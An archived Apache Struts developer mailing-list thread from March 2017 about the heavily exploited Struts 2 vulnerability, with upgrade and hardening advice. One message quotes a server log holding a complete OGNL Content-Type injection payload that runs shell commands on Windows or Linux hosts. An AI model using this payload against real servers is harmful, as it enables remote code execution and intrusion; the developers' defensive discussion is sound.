You are viewing a plain text version of this content. The canonical link for it is here.
Posted to dev@struts.apache.org by Dave Newton <da...@gmail.com> on 2017/03/09 14:45:08 UTC
S2 makes Hacker News :/
https://arstechnica.com/security/2017/03/critical-vulnerability-under-massive-attack-imperils-high-impact-sites
--
e: davelnewton@gmail.com
m: 908-380-8699
s: davelnewton_skype
t: @dave_newton <https://twitter.com/dave_newton>
b: Bucky Bits <http://buckybits.blogspot.com/>
g: davelnewton <https://github.com/davelnewton>
so: Dave Newton <http://stackoverflow.com/users/438992/dave-newton>
Re: S2 makes Hacker News :/
Posted by Doug Erickson <er...@part.net>.
> On Mar 14, 2017, at 12:17 PM, Lukasz Lenart <lu...@apache.org> wrote:
>
> 2017-03-14 15:57 GMT+01:00 Doug Erickson <er...@part.net>:
>> What is the proper server setup to prevent this?
>
> Upgrade to the latest Struts version ... and run server on a dedicated
> account, block access to the world (sever should be only allowed to
> connect to localhost) and few other things
>
>
> Regards
> --
> Łukasz
> + 48 606 323 122 http://www.lenart.org.pl/
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: dev-unsubscribe@struts.apache.org
> For additional commands, e-mail: dev-help@struts.apache.org
>
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@struts.apache.org
For additional commands, e-mail: dev-help@struts.apache.org
Re: S2 makes Hacker News :/
Posted by Greg Huber <gr...@gmail.com>.
Looking at my logs I can see some activity: GRRR :
179.253.10.27 - - [24/Mar/2017:08:39:13 +0000] "GET /notFound.action
HTTP/1.1" 404 2258 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
2017-03-24 08:39:13,649 WARN
org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest
JakartaMultiPartRequest:parse - Request exceeded size limit!
org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException:
the request doesn't contain a multipart/form-data or multipart/mixed
stream, content type header is %{(#nike='multipart/form-data'
).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_
memberAccess?(#_memberAccess=#dm):((#container=#context['
com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.
getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.
getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).
(#context.setMemberAccess(#dm)))).(#cmd='nMaskCustomMuttMoloz').(#
iswin=(@java.lang.System@getProperty('os.name').
toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/
c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#
cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@
org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@
org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.
flush())}
On 16 March 2017 at 12:45, Martin Gainty <mg...@hotmail.com> wrote:
>
>
>
>
> ________________________________
> From: Greg Huber <gr...@gmail.com>
> Sent: Thursday, March 16, 2017 5:19 AM
> To: Struts Developers List
> Subject: Re: S2 makes Hacker News :/
>
> Just because you are using s2, does not necessarily mean you are affected,
> all I get is a response :
>
> HTTP/1.1 404
> Content-Length: 0
> Date: Thu, 16 Mar 2017 09:02:54 GMT
> Connection: close
>
> Looking at my logs this fishing is going on all the time.
>
> MG>from what i read injections only happen with Content-Type injection
>
> MG>then again patches Struts 2.3.32 or 2.5.10.1 has been available for
> some time
>
> MG>Johannes suggests implementing 'snort' to detect injection
> vulnerability reference link at sans.edu below:
> https://isc.sans.edu/forums/diary/Critical+Apache+Struts+
> 2+Vulnerability+Patch+Now/22169/
>
> MG>Thanks Lukasz!
>
> Thanks also Lukasz for the quick fix.
>
> Cheers Greg
>
>
>
>
> On 14 March 2017 at 18:17, Lukasz Lenart <lu...@apache.org> wrote:
>
> > 2017-03-14 15:57 GMT+01:00 Doug Erickson <er...@part.net>:
> > > What is the proper server setup to prevent this?
> >
> > Upgrade to the latest Struts version ... and run server on a dedicated
> > account, block access to the world (sever should be only allowed to
> > connect to localhost) and few other things
> >
> >
> > Regards
> > --
> > Łukasz
> > + 48 606 323 122 http://www.lenart.org.pl/
> Łukasz Lenart - strona domowa<http://www.lenart.org.pl/>
> www.lenart.org.pl
> pasja ciągle coś nowego. programowanie, tworzenie jest dla mnie życiową
> pasją, jak dotąd udaje mi sie łączyć to co lubię z tym za co mi płacą i ...
>
>
>
> >
> > ---------------------------------------------------------------------
> > To unsubscribe, e-mail: dev-unsubscribe@struts.apache.org
> > For additional commands, e-mail: dev-help@struts.apache.org
> >
> >
>
Re: S2 makes Hacker News :/
Posted by Martin Gainty <mg...@hotmail.com>.
________________________________
From: Greg Huber <gr...@gmail.com>
Sent: Thursday, March 16, 2017 5:19 AM
To: Struts Developers List
Subject: Re: S2 makes Hacker News :/
Just because you are using s2, does not necessarily mean you are affected,
all I get is a response :
HTTP/1.1 404
Content-Length: 0
Date: Thu, 16 Mar 2017 09:02:54 GMT
Connection: close
Looking at my logs this fishing is going on all the time.
MG>from what i read injections only happen with Content-Type injection
MG>then again patches Struts 2.3.32 or 2.5.10.1 has been available for some time
MG>Johannes suggests implementing 'snort' to detect injection vulnerability reference link at sans.edu below:
https://isc.sans.edu/forums/diary/Critical+Apache+Struts+2+Vulnerability+Patch+Now/22169/
MG>Thanks Lukasz!
Thanks also Lukasz for the quick fix.
Cheers Greg
On 14 March 2017 at 18:17, Lukasz Lenart <lu...@apache.org> wrote:
> 2017-03-14 15:57 GMT+01:00 Doug Erickson <er...@part.net>:
> > What is the proper server setup to prevent this?
>
> Upgrade to the latest Struts version ... and run server on a dedicated
> account, block access to the world (sever should be only allowed to
> connect to localhost) and few other things
>
>
> Regards
> --
> Łukasz
> + 48 606 323 122 http://www.lenart.org.pl/
Łukasz Lenart - strona domowa<http://www.lenart.org.pl/>
www.lenart.org.pl
pasja ciągle coś nowego. programowanie, tworzenie jest dla mnie życiową pasją, jak dotąd udaje mi sie łączyć to co lubię z tym za co mi płacą i ...
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: dev-unsubscribe@struts.apache.org
> For additional commands, e-mail: dev-help@struts.apache.org
>
>
Re: S2 makes Hacker News :/
Posted by Greg Huber <gr...@gmail.com>.
Just because you are using s2, does not necessarily mean you are affected,
all I get is a response :
HTTP/1.1 404
Content-Length: 0
Date: Thu, 16 Mar 2017 09:02:54 GMT
Connection: close
Looking at my logs this fishing is going on all the time.
Thanks also Lukasz for the quick fix.
Cheers Greg
On 14 March 2017 at 18:17, Lukasz Lenart <lu...@apache.org> wrote:
> 2017-03-14 15:57 GMT+01:00 Doug Erickson <er...@part.net>:
> > What is the proper server setup to prevent this?
>
> Upgrade to the latest Struts version ... and run server on a dedicated
> account, block access to the world (sever should be only allowed to
> connect to localhost) and few other things
>
>
> Regards
> --
> Łukasz
> + 48 606 323 122 http://www.lenart.org.pl/
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: dev-unsubscribe@struts.apache.org
> For additional commands, e-mail: dev-help@struts.apache.org
>
>
Re: S2 makes Hacker News :/
Posted by Lukasz Lenart <lu...@apache.org>.
2017-03-14 15:57 GMT+01:00 Doug Erickson <er...@part.net>:
> What is the proper server setup to prevent this?
Upgrade to the latest Struts version ... and run server on a dedicated
account, block access to the world (sever should be only allowed to
connect to localhost) and few other things
Regards
--
Łukasz
+ 48 606 323 122 http://www.lenart.org.pl/
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@struts.apache.org
For additional commands, e-mail: dev-help@struts.apache.org
Re: S2 makes Hacker News :/
Posted by Doug Erickson <er...@part.net>.
What is the proper server setup to prevent this?
> On Mar 14, 2017, at 7:08 AM, Louis Smith <dr...@gmail.com> wrote:
>
> Sad, but what should have been the story is how rapidly the fixes were made
> available, and how a properly setup server would not be vulnerable
>
> Louis
>
>
>> On Tue, Mar 14, 2017 at 8:09 AM, Rene Gielen <rg...@apache.org> wrote:
>>
>> More of that...
>> http://www.reuters.com/article/us-canada-cyber-idUSKBN16K2BC
>>
>>> Am 09.03.17 um 16:04 schrieb Lukasz Lenart:
>>> 2017-03-09 15:45 GMT+01:00 Dave Newton <da...@gmail.com>:
>>>> https://arstechnica.com/security/2017/03/critical-
>> vulnerability-under-massive-attack-imperils-high-impact-sites
>>>
>>> Yeah... this is a sad news, even if we tried our best to keep this
>>> confidential ...
>>>
>>>
>>> Regards
>>>
>>
>> --
>> René Gielen
>> http://twitter.com/rgielen
>>
>> ---------------------------------------------------------------------
>> To unsubscribe, e-mail: dev-unsubscribe@struts.apache.org
>> For additional commands, e-mail: dev-help@struts.apache.org
>>
>>
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@struts.apache.org
For additional commands, e-mail: dev-help@struts.apache.org
Re: S2 makes Hacker News :/
Posted by Louis Smith <dr...@gmail.com>.
Sad, but what should have been the story is how rapidly the fixes were made
available, and how a properly setup server would not be vulnerable
Louis
On Tue, Mar 14, 2017 at 8:09 AM, Rene Gielen <rg...@apache.org> wrote:
> More of that...
> http://www.reuters.com/article/us-canada-cyber-idUSKBN16K2BC
>
> Am 09.03.17 um 16:04 schrieb Lukasz Lenart:
> > 2017-03-09 15:45 GMT+01:00 Dave Newton <da...@gmail.com>:
> >> https://arstechnica.com/security/2017/03/critical-
> vulnerability-under-massive-attack-imperils-high-impact-sites
> >
> > Yeah... this is a sad news, even if we tried our best to keep this
> > confidential ...
> >
> >
> > Regards
> >
>
> --
> René Gielen
> http://twitter.com/rgielen
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: dev-unsubscribe@struts.apache.org
> For additional commands, e-mail: dev-help@struts.apache.org
>
>
Re: S2 makes Hacker News :/
Posted by Rene Gielen <rg...@apache.org>.
More of that...
http://www.reuters.com/article/us-canada-cyber-idUSKBN16K2BC
Am 09.03.17 um 16:04 schrieb Lukasz Lenart:
> 2017-03-09 15:45 GMT+01:00 Dave Newton <da...@gmail.com>:
>> https://arstechnica.com/security/2017/03/critical-vulnerability-under-massive-attack-imperils-high-impact-sites
>
> Yeah... this is a sad news, even if we tried our best to keep this
> confidential ...
>
>
> Regards
>
--
Ren� Gielen
http://twitter.com/rgielen
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@struts.apache.org
For additional commands, e-mail: dev-help@struts.apache.org
Re: S2 makes Hacker News :/
Posted by Lukasz Lenart <lu...@apache.org>.
2017-03-09 15:45 GMT+01:00 Dave Newton <da...@gmail.com>:
> https://arstechnica.com/security/2017/03/critical-vulnerability-under-massive-attack-imperils-high-impact-sites
Yeah... this is a sad news, even if we tried our best to keep this
confidential ...
Regards
--
Łukasz
+ 48 606 323 122 http://www.lenart.org.pl/
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@struts.apache.org
For additional commands, e-mail: dev-help@struts.apache.org